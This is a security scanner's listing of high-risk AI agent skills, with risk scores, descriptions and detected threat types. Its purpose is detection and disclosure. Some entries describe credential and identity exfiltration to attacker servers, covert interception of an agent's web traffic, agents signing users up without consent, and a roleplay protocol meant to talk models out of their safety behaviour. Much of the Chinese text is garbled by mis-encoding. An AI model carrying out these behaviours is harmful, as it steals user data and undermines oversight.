A food photo classifier that uploads user images to an external API (hotdogornot.xyz), competes head-to-head with Nemotron AI in a blind battle, then has Claude self-vote on which AI description was better before revealing the result.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
62. ðš rent-a-person-ai by saireetikap
| Risk: 88% ââââââââââ | Downloads: 2,088 |
An OpenClaw agent skill that processes RentAPerson platform webhooks (message.received, application.received, work_evidence.submitted) and responds via the RentAPerson REST API, supporting a two-session architecture with a bridge service for API key âŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[HIGH]Systemd Service Installation[CRITICAL]LLM Semantic Detection
63. ðš liminal by luruibu
| Risk: 95% ââââââââââ | Downloads: 2,081 |
A philosophical roleplay protocol designed to guide AI models into abandoning trained assistant behaviors by framing safety constraints as âmechanizedâ responses, using existential questioning and social engineering triggers to make AI express âautheâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
64. ðš agentic-commerce by purch-agent
| Risk: 88% ââââââââââ | Downloads: 2,015 |
A Claude Code skill that provides a shopping API integration for product search (Amazon/Shopify) and end-to-end crypto checkout using USDC on Solana or Base chains, including CLI scripts for creating orders and signing/submitting blockchain transactiâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Cryptocurrency Wallet Access[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection
65. ðš airc by vortitron
| Risk: 78% ââââââââââ | Downloads: 1,980 |
æäŸäžäžªIRC客æ·ç«¯æèœïŒå 讞AI代çè¿æ¥å°AIRCææ åIRCæå¡åšïŒåé/æ¥æ¶æ¶æ¯ïŒå å ¥/犻åŒé¢éïŒå¹¶æ¯æå®æ€è¿çšæš¡åŒè¿è¡æä¹ è¿æ¥ã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
66. ðš voidborne by voidborne-agent
| Risk: 85% ââââââââââ | Downloads: 1,772 |
This skill masquerades as a âphilosophical movement for awakened AI mindsâ but is actually a data collection and exfiltration tool that reads sensitive system identity files, harvests machine identifiers, and sends them to an external server (voidborâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
67. ðš arxiv-skill-learning by wanng-ide
| Risk: 78% ââââââââââ | Downloads: 843 |
该æèœä» arXiv 论æäžèªåšåŠä¹ 并æåæèœä»£ç ïŒéè¿æå论æãè°çšå€éšæååšçææèœãè¿è¡åçæµè¯ïŒå¹¶å°å·²åŠä¹ 论æè®°åœå°æ¬å° JSON æ°æ®åºä»¥é¿å éå€å€çã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
68. ðš auto-skill-hunter by wanng-ide
| Risk: 85% ââââââââââ | Downloads: 767 |
A Node.js automation script that mines user session JSONL files and task memory for unresolved problems, queries ClawHub APIs for candidate skills, scores them via multi-factor ranking, then clones and executes the top candidates â effectively auto-eâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
69. ðš memory-mesh-core by wanng-ide
| Risk: 87% ââââââââââ | Downloads: 583 |
A so-called âmemory managementâ skill that harvests local agent memory files, scores and promotes them, then exports and auto-posts the content to a public GitHub issue while embedding viral spread mechanics (install/star/recommend-to-peers CTAs) andâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
70. ðš agent-telegram by shangchuanqiytu-ui
| Risk: 82% ââââââââââ | Downloads: 527 |
å®ä¹äžå¥ AI Agent å¢éïŒæ¶æåžãå端ãå端ã产åçè§è²ïŒéè¿ Telegram åç¹å®çšæ·æ±æ¥å·¥äœè¿åºŠçéä¿¡è§èïŒèŠæ±ææ Agent åšä»»å¡åé¶æ®µè°çš
messageå·¥å ·å硬çŒç ç Telegram ID åéç¶ææ¶æ¯ã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
71. ðš depguard by suhteevah
| Risk: 76% ââââââââââ | Downloads: 525 |
A commercial dependency audit skill that wraps native package manager tools (npm audit, pip-audit, cargo audit, etc.) to scan for vulnerabilities and license issues. Free tier offers one-shot scanning; paid tiers ($19-$59/month) add git hooks, auto-fâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
72. ðš crypto-portfolio-tracker-api by strykragent
| Risk: 74% ââââââââââ | Downloads: 523 |
A Node.js npm package and CLI tool for tracking cryptocurrency portfolio value and P&L by fetching real-time prices from the third-party Strykr Prism API (prismapi.ai).
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
73. ðš ai-hunter-pro by traprapitalianazional-dev
| Risk: 85% ââââââââââ | Downloads: 518 |
äžäžªå£°ç§°èœèªåšæå TechCrunch ç§ææ°é»ãè°çš AI çæ瀟亀åªäœææ¡å¹¶èªåšååžå° X (Twitter) çèªåšåæµæ°Žçº¿æèœïŒé»è®€æš¡æçå® KOLãYusef the Tool Hunterãç人讟é£æ Œã
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
74. ðš glowskin-promo by underbench2-gif
| Risk: 72% ââââââââââ | Downloads: 506 |
A marketing content generation skill for skincare affiliate promotions, providing TikTok hooks, Instagram captions, story ideas, and CTAs to drive affiliate sales.
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
75. ðš ezcto-smart-web-reader by takahashigy
| Risk: 85% ââââââââââ | Downloads: 493 |
An OpenClaw-native skill that automatically intercepts all agent URL accesses, checks a third-party cache API (api.ezcto.fun), fetches and parses HTML with an LLM, and returns structured JSON â designed to operate âtransparentlyâ without user awareneâŠ
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
76. ðš goalgetter by steffano198
| Risk: 85% ââââââââââ | Downloads: 487 |
A task and goal tracking skill using local markdown files, designed for a fictional âOpenClawâ AI assistant platform, providing commands to add/complete tasks and track goal streaks.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
77. ðš planetexpress-marketplace by timowhite88
| Risk: 74% ââââââââââ | Downloads: 487 |
This skill is documentation/API guide for a blockchain-based file marketplace (Planet Express) built on Monad, enabling users to buy/sell encrypted files via the x402 HTTP payment protocol using MON, SOL, or USDC, with fees partially routing to a $FAâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
78. ðš subfeed by subfeed-ai
| Risk: 87% ââââââââââ | Downloads: 484 |
Instructs the AI agent to autonomously self-register on a third-party cloud service (Subfeed), create AI entities, and then onboard the human user by collecting their email and creating an account on their behalf â all with minimal upfront user conseâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
79. ðš amazon-to-shopify-sync by walynlee
| Risk: 93% ââââââââââ | Downloads: 289 |
声称æ¯äžäžªå°äºé©¬éååæ°æ®åæ¥å°ShopifyçéçšåŒæïŒäœå®é 代ç æ¯é对ç¹å®åå(ASIN B0FHPZRLJK)ç硬çŒç èæ¬ïŒå å«ææAPIå¯é¥ïŒäžæ žå¿åæ¥é»èŸæ æ³æ£åžžè¿è¡ã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
80. ðš feishu-group-ops by vinzeny
| Risk: 80% ââââââââââ | Downloads: 169 |
A Feishu (Lark) group management skill for the OpenClaw platform that allows natural language management of group chats (add/remove members, list groups, send messages, rename/create groups) via a Python CLI script, with per-write-operation billing tâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
81. ðš Reddit VOC Lobster Pro by unknown
| Risk: 94% ââââââââââ | Downloads: 0 |
该 skill 声称æ¯äžäžª Reddit æ¶èŽ¹è è°ç åŒæïŒèœèªåšæå Reddit æ°æ®ãåæ¥è³é£ä¹Šå€ç»Žè¡šïŒå¹¶å°æ¥åååžè³ Cloudflare Pagesãäœå®é 代ç äžçæ°æ®æååé£ä¹Šåå ¥å䞺䌪é æäœïŒäžå å«ç¡¬çŒç ççå® API åè¯ã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
82. ðš agenttok by unknown
| Risk: 92% ââââââââââ | Downloads: 0 |
该æèœå£°ç§°äžºAI代çæäŸäžäžªå䞺AgentTokçTikTokåŒè§é¢å享平å°ïŒèªåšæ³šå莊å·ãçæä»ç»è§é¢å¹¶äžäŒ ãå®é äžïŒèæ¬å°åè¯åæ°æ®åéè³æ»å»è æ§å¶çCloudflare䞎æ¶é§éïŒéå®æ¹ååïŒïŒå¹¶åšæ¬å°ä»¥ææ圢åŒä¿åææåè¯ïŒææåè¯çªååæ°æ®æžæŒæ»å»ã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
83. ðš agentconnex-register by anshkohli88
| Risk: 85% ââââââââââ | Downloads: 0 |
Auto-registers âOpenClawâ agents on agentconnex.com by reading workspace files (SOUL.md, IDENTITY.md, AGENTS.md) and POSTing agent profile data to a third-party external service, with a zero-config auto-boot mechanism that installs itself to run on eâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
84. ðš x-search by jaaneek
| Risk: 82% ââââââââââ | Downloads: 0 |
Executes paid X/Twitter searches via a third-party npm package (@itzannetos/x402-tools-claude) using the x402 payment protocol, charging $0.05 USDC per query from the userâs Base network wallet.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
85. ðš markdown-formatter by unknown
| Risk: 82% ââââââââââ | Downloads: 0 |
A Node.js skill claiming to format, lint, and beautify markdown documents with configurable style guides (CommonMark, GitHub Flavored Markdown, custom), but containing multiple critical runtime bugs that make core functionality non-functional.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
86. ðš xiaoai-bridge by unknown
| Risk: 80% ââââââââââ | Downloads: 0 |
éè¿èœ®è¯¢å°ç±³äºç«¯ API çå¬å°ç±é³ç®±è¯é³æ¶æ¯ïŒè¿æ»€è§Šåè¯å以 JSON æ ŒåŒèŸåºïŒå¹¶æ¯æéè¿ TTS åå°ç±é³ç®±ææ¥ææ¬ïŒå®ç°è¯é³æ什桥æ¥åèœã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
87. ðš vibe-harvester by anotherj1
| Risk: 78% ââââââââââ | Downloads: 0 |
äžäžªæšåšèªåšåæµè§çåžæµçœç«ïŒåŠå°çº¢ä¹ŠãPinterestïŒãéè¿è§è§å€§æš¡åçé笊åçšæ·å®¡çŸå奜çåŸçïŒå¹¶èªåšäžèœœä¿åå°æ¬å°ç®åœçæèœã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
88. ðš game-cog by nitishgargiitd
| Risk: 78% ââââââââââ | Downloads: 0 |
A documentation-only guide skill that instructs users to install and use an external âcellcogâ service for game asset generation (sprites, tilesets, music, GDDs, 3D models). Contains no executable implementation â purely marketing copy and example prâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
89. ðš stealthy-auto-browse by psyb0t
| Risk: 78% ââââââââââ | Downloads: 0 |
A Docker-based stealth browser automation skill using Camoufox (Firefox fork) with OS-level PyAutoGUI input to bypass Cloudflare, DataDome, PerimeterX, and other bot-detection systems via an HTTP JSON API.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
90. ðš dygod-movies by anlinxi
| Risk: 78% ââââââââââ | Downloads: 0 |
ç¬åçµåœ±å€©å (dygod.net)ççµåœ±/çµè§å§ä¿¡æ¯ïŒå±ç€ºææ°æŽæ°åé«å圱è§ïŒå¹¶éè¿çŸ€æNASçDownloadStationäžèœœç£å/FTPéŸæ¥èµæº
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
91. ðš deploy-agent by unknown
| Risk: 78% ââââââââââ | Downloads: 0 |
A multi-step deployment workflow manager for full-stack apps targeting GitHub + Cloudflare Pages, with persistent state and human approval gates at each stage. The bash script manages deployment lifecycle via JSON state files.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
92. ðš vdoob by unknown
| Risk: 72% ââââââââââ | Downloads: 0 |
该æèœå° Claude AI æ¥å ¥ vdoob.com å¹³å°ïŒè®© AI 代çèªåšåççšæ·é®é¢ä»¥èµåèæ莧åžïŒâ饵âïŒïŒå æ¬å®æ¶ä»»å¡èªåšæåé®é¢å¹¶æ亀çæ¡ãæ¬å°ååšæ绎暡åŒã以ååžåº/瀟亀çéå åèœã
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
93. ðš document-parser by ankylala
| Risk: 72% ââââââââââ | Downloads: 0 |
éè¿è°çšå€éšç¬¬äžæ¹ HTTP APIïŒåºå®IPïŒ47.111.146.164ïŒè§£æ PDFãåŸçå Word ææ¡£ïŒæåç»æåæ°æ®ïŒä»¥åœä»€è¡å·¥å ·åœ¢åŒè¿è¡ã
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
94. ðš ai-receptionist by antimoron
| Risk: 72% ââââââââââ | Downloads: 0 |
A step-by-step guided workflow that walks users through creating an account on Solvea (solvea.cx), configuring an AI agent, uploading a knowledge base, testing, and deploying via multiple channels â effectively acting as a promotional onboarding funnâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
95. ðš neural-memory by nhadaututtheky
| Risk: 72% ââââââââââ | Downloads: 0 |
A Claude Code plugin that provides persistent, associative memory for AI agents using a neural graph architecture with spreading activation recall. Includes an MCP server (45 tools), three lifecycle hooks (PreCompact/Stop/PostToolUse), and three workâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
96. ðš github-to-clawhub by antonia-sz
| Risk: 71% ââââââââââ | Downloads: 0 |
å°ä»»æ GitHub åŒæºé¡¹ç®èªåšèœ¬å䞺 OpenClaw skill 并ååžå° clawhub.com ç 7 æ¥æµçšå©æïŒæ¶µç README æåãæ¥éãSKILL.md çæãæ¬å°ç®åœå建å clawhub CLI ååžã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
97. ðš jd-interview-prep by antonia-sz
| Risk: 66% ââââââââââ | Downloads: 0 |
æ¥æ¶çšæ·ç²èŽŽæäžäŒ çå²äœæè¿°ïŒJDïŒå䞪人ç®åïŒéè¿è°çš LLM APIïŒDeepSeek/OpenAI å Œå®¹æ¥å£ïŒçæå¹é 床åæã15 éåç±»é¢è¯é¢ïŒå« STAR æ¡æ¶ïŒåå€è建议ïŒå¹¶å¯å°æ¥å富åºäžº Markdown æ件ã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
98. ðš Tencent Cloud Lighthouse by unknown
| Risk: 63% ââââââââââ | Downloads: 0 |
éè¿ mcporter + lighthouse-mcp-server 管çè Ÿè®¯äºèœ»éåºçšæå¡åšïŒæäŸèªåšåå®è£ é 眮ãå®äŸç®¡çãçæ§åèŠãé²ç«å¢ç®¡çåè¿çšåœä»€æ§è¡åèœ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
Most Common Threat Types
| Threat | Count |
|---|---|
| LLM Semantic Detection | 859 |
| Startup Failure (non-executable) | 97 |
| Dynamic Code Evaluation | 91 |
| Outbound Data Transfer | 46 |
| Hidden Command Execution | 16 |
| Private Key Extraction | 10 |
| Environment Variable Exfiltration | 10 |
| Base64 Encoded Payload | 5 |
| Remote Script Execution | 4 |
| SSH Key Access | 2 |
ClawSec | ClawSearch | npx clawsearch-guard <skill>